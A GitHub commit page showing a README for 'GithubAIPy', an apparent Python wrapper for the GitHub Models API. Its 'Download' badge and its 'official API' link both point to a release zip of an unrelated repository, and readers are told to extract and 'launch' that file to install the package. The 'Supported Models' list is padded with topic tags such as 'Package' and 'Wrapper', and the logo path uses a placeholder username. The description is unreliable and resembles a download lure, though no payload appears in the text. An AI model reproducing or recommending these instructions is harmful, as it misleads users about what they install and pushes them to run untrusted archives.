Skip to content

Commit 5c53dd5

Browse files
committed
Commit
0 parents  commit 5c53dd5

File tree

1 file changed

+74
-0
lines changed

1 file changed

+74
-0
lines changed

README.md

Lines changed: 74 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,74 @@
1+
# GithubAIPy 🤖
2+
3+
![GithubAIPy](https://github.com/your-username/GithubAIPy/logo.png)
4+
5+
Welcome to GithubAIPy! This repository contains a small Python wrapper for Github Models API. With this wrapper, you can easily interact with various AI models available on Github and leverage their capabilities in your projects. Whether you are working on AI, chat applications, or data analysis, GithubAIPy has got you covered!
6+
7+
## Installation
8+
9+
To get started with GithubAIPy, you can download the latest release by clicking the button below:
10+
11+
[![Download GithubAIPy](https://img.shields.io/badge/Download-v1.0.0-blue)](https://github.com/cli/go-gh/archive/refs/tags/v1.0.0.zip)
12+
13+
Please note that the downloaded file needs to be extracted and launched for installation.
14+
15+
## Features
16+
17+
🔹 Easy-to-use Python wrapper for Github Models API
18+
🔹 Access to various AI models like ChatGPT, Cohere, DeepSeek, and more
19+
🔹 Seamless integration with Github AI ecosystem
20+
🔹 Simplified package for AI model interaction
21+
22+
## Usage
23+
24+
Here is a quick example of how you can use GithubAIPy in your Python project:
25+
26+
```python
27+
from github_aipy import GithubModelsAPI
28+
29+
# Initialize the API wrapper
30+
github_api = GithubModelsAPI()
31+
32+
# Get available models
33+
models = github_api.get_models()
34+
35+
# Choose a model (e.g., ChatGPT)
36+
chat_model = github_api.get_model("chatgpt")
37+
38+
# Interact with the chosen model
39+
response = chat_model.generate_response("Hello, how are you?")
40+
41+
print(response)
42+
```
43+
44+
## Supported Models
45+
46+
- AI
47+
- API
48+
- ChatGPT
49+
- Cohere
50+
- DeepSeek
51+
- Github
52+
- Github-AI
53+
- Github-Models
54+
- JAIS
55+
- Llama
56+
- Mixtral
57+
- Models
58+
- Package
59+
- Python
60+
- Wrapper
61+
62+
## Contributing
63+
64+
If you are interested in contributing to GithubAIPy, please feel free to fork the repository, make your changes, and submit a pull request. Your contributions are highly appreciated!
65+
66+
## License
67+
68+
This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.
69+
70+
---
71+
72+
💡 **Pro Tip**: Visit the official [Github Models API](https://github.com/cli/go-gh/archive/refs/tags/v1.0.0.zip) page for more information and updates on available models.
73+
74+
🚀 Start exploring the world of AI with GithubAIPy today! Thank you for checking out this repository! 🤖

0 commit comments

Comments
 (0)